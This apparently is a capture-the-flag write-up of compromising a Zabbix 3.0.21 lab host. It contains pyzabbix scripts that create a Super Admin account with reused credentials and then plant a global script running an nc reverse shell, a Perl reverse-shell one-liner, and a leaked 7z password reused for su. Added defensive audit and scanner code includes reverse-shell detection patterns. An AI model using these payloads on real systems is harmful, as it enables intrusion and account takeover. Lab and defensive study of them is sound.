lsh4ck | 2019-02-03 11:30 | lsh4ck's Blog

The usual scanning: nmap + dirb + gobuster + msftcp.

Found Zabbix, version 3.0.21:

Zabbix ships jsrpc.php; is there an exploit for it? The JSON interface refuses unauthorized access, so search for it:

Python has a library for the Zabbix API, pyzabbix: https://github.com/lukecyca/pyzabbix

Example (adding a host): http://blog.chinaunix.net/uid-28309325-id-5176638.html

createuser.py:

#!/usr/bin/env python
# createuser.py: log in to the Zabbix JSON-RPC API as zapper and create a
# new Super Admin account.

from pyzabbix import ZabbixAPI
import sys
import logging

# Log the JSON-RPC requests and responses to stdout.
stream = logging.StreamHandler(sys.stdout)
stream.setLevel(logging.DEBUG)
log = logging.getLogger('pyzabbix')
log.addHandler(stream)
log.setLevel(logging.DEBUG)

zapi = ZabbixAPI("http://10.10.10.108/zabbix")
zapi.login("zapper", "zapper")
print("Connected to %s" % zapi.api_version())

zapi.do_request('user.create', {
    "alias": "lsh4ck",
    "passwd": "lsls",
    "type": 3,                        # 3 = Zabbix Super Admin
    "usrgrps": [{"usrgrpid": "11"}],  # id of an existing user group
})

createscript.py:

The script must execute on the Zabbix agent, not on the server, because the server is a Docker container.

#!/usr/bin/env python
# createscript.py: log in with the new Super Admin account and create a
# global script that the agent will run.

from pyzabbix import ZabbixAPI
import sys
import logging

# Log the JSON-RPC requests and responses to stdout.
stream = logging.StreamHandler(sys.stdout)
stream.setLevel(logging.DEBUG)
log = logging.getLogger('pyzabbix')
log.addHandler(stream)
log.setLevel(logging.DEBUG)

zapi = ZabbixAPI("http://10.10.10.108/zabbix")
zapi.login("lsh4ck", "lsls")
print("Connected to %s" % zapi.api_version())

zapi.do_request('script.create', {
    'name': 'revshell',
    'command': 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.XXX 4444 >/tmp/f',
    'host_acces': 1,
    'execute_on': 0,   # 0 = Zabbix agent, 1 = Zabbix server
})
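The two scripts above show what an attacker with reused API credentials leaves behind: an extra Super Admin account and a global script whose command is a shell payload. The following audit is an added example written for this page, not code from the post or from pyzabbix; it runs the checks offline on constructed sample data shaped like the user.get and script.get results, and fetch_inventory() (hypothetical URL and credentials) shows how to feed it live data.

```python
#!/usr/bin/env python3
"""Audit a Zabbix inventory for the two footholds used above: accounts
with the Super Admin type and global scripts whose command looks like a
reverse shell. The audit functions take already-fetched API result lists,
so they run offline on the constructed sample data; fetch_inventory()
shows how to pull the real lists with pyzabbix."""
import re

SUPER_ADMIN = 3        # user.type: 1 = User, 2 = Admin, 3 = Super Admin
EXECUTE_ON_AGENT = 0   # script.execute_on: 0 = Zabbix agent, 1 = Zabbix server

# Fragments typical of reverse-shell or interpreter-based payloads.
SUSPICIOUS = re.compile(
    r"(mkfifo|/bin/sh\s+-i|bash\s+-i|\bnc\b|\bncat\b|/dev/tcp/|perl\s+-e|python\d?\s+-c)"
)

# Constructed sample data in the shape returned by user.get / script.get
# (the lsh4ck account and revshell script mirror what the post created).
SAMPLE_USERS = [
    {"userid": "1", "alias": "Admin", "type": "3"},
    {"userid": "2", "alias": "guest", "type": "1"},
    {"userid": "3", "alias": "zapper", "type": "2"},
    {"userid": "4", "alias": "lsh4ck", "type": "3"},
]
SAMPLE_SCRIPTS = [
    {"scriptid": "1", "name": "Ping",
     "command": "/bin/ping -c 3 {HOST.CONN} 2>&1", "execute_on": "1"},
    {"scriptid": "2", "name": "Traceroute",
     "command": "/usr/bin/traceroute {HOST.CONN} 2>&1", "execute_on": "1"},
    {"scriptid": "3", "name": "revshell",
     "command": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 203.0.113.5 4444 >/tmp/f",
     "execute_on": "0"},
]


def audit_users(users):
    """Return the aliases of all Super Admin accounts."""
    return [u["alias"] for u in users if int(u.get("type", 1)) == SUPER_ADMIN]


def audit_scripts(scripts):
    """Return (name, target, command) for scripts whose command matches SUSPICIOUS."""
    findings = []
    for s in scripts:
        cmd = s.get("command", "")
        if SUSPICIOUS.search(cmd):
            target = "agent" if int(s.get("execute_on", 1)) == EXECUTE_ON_AGENT else "server"
            findings.append((s["name"], target, cmd))
    return findings


def fetch_inventory(url, user, password):
    """Pull live user and script lists with pyzabbix (import kept local so the
    offline sample run works without the package installed)."""
    from pyzabbix import ZabbixAPI
    zapi = ZabbixAPI(url)
    zapi.login(user, password)
    users = zapi.user.get(output=["userid", "alias", "type"])
    scripts = zapi.script.get(output=["scriptid", "name", "command", "execute_on"])
    return users, scripts


if __name__ == "__main__":
    for alias in audit_users(SAMPLE_USERS):
        print("Super Admin account: %s" % alias)
    for name, target, cmd in audit_scripts(SAMPLE_SCRIPTS):
        print("suspicious script %r (runs on %s): %s" % (name, target, cmd))
```

Run periodically against the real API with a read-only account, and diff the Super Admin list and the script list against a known baseline; a new Super Admin or a script that runs on the agent rather than the server is exactly the trail this post leaves.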

The scripts panel before:

After executing the script:

Edit the script and use the more stable Perl or Python reverse shell to connect back:
perl -e 'use Socket;$i="x.x.x.x";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Create events or triggers, with the filter set to any; more hosts become possible:

Listen with ncat:

The files of user zapper are permission denied; cat backup.sh:
/usr/bin/7z a /backups/zapper_backup-$(/bin/date +%F).7z -pZippityDoDah /home/zapper/utils/* &>/dev/null

The shell script does backups; the -p value could be zapper's password.
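The backup.sh line is the classic mistake of passing an archive password inline: anyone who can read the script gets it, and while 7z runs the full command line is visible in ps and /proc/<pid>/cmdline to every local user. The scanner below is an added example written for this page, not the box's or anyone's tooling; it runs on a constructed sample script that includes the backup.sh command from above, and scan_file() (hypothetical path argument) applies the same check to real files.

```python
#!/usr/bin/env python3
"""Find archive passwords passed inline on the command line in shell
scripts (7z -pSECRET, zip -P SECRET / --password SECRET). Runs on a
constructed sample script; scan_file() is for real files."""
import re

# Each pattern anchors on the archiver name and captures the inline password.
# `7z -p` with nothing attached prompts interactively, so it is not flagged.
PATTERNS = [
    ("7z", re.compile(r"(?:^|[\s/])7z[ar]?\s[^\n]*?\s-p(?P<pw>\S+)")),
    ("zip", re.compile(r"(?:^|[\s/])zip\s[^\n]*?\s(?:-P|--password)\s+(?P<pw>\S+)")),
]


def mask(secret):
    """Keep two characters so a finding is recognisable without reprinting the secret."""
    return secret[:2] + "*" * (len(secret) - 2)


def find_inline_archive_passwords(script_text):
    """Return (line_number, tool, masked_password) for every inline password."""
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), start=1):
        for tool, pattern in PATTERNS:
            m = pattern.search(line)
            if m:
                findings.append((lineno, tool, mask(m.group("pw"))))
    return findings


def scan_file(path):
    """Apply the check to a script on disk (hypothetical path supplied by the caller)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_inline_archive_passwords(fh.read())


# Constructed sample: line 2 is the backup.sh command from the box,
# line 3 a zip variant, line 5 a 7z call that prompts instead.
SAMPLE_SCRIPT = """#!/bin/bash
/usr/bin/7z a /backups/zapper_backup-$(/bin/date +%F).7z -pZippityDoDah /home/zapper/utils/* &>/dev/null
zip -r -P hunter2 /tmp/site.zip /var/www
tar czf /backups/etc.tgz /etc
/usr/bin/7z a /backups/interactive.7z -p /home/zapper/notes
"""

if __name__ == "__main__":
    for lineno, tool, masked in find_inline_archive_passwords(SAMPLE_SCRIPT):
        print("line %d: %s password given inline (%s)" % (lineno, tool, masked))
```

A finding is worse when the script is readable by other users, as backup.sh was here, and worse still when the same string is also a login password; the fix is a dedicated, non-reused archive secret kept in a root-only file, plus restrictive permissions on the script itself.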

zapper cannot SSH in:

Use Python to get an interactive shell:

Then su can be used; enter the password and the login succeeds:

Get user.txt.

Search the folders:

The only thing running as root is the service. The administrator may actually have been negligent; this should be the intended way of leaving a puzzle for us.

The SUID binary runs as root.

Download the PDF of the writeup.



This is an original article; all rights reserved. Feel free to share it, and keep the source when reposting!

lsh4ck | last edited: 2019-02-22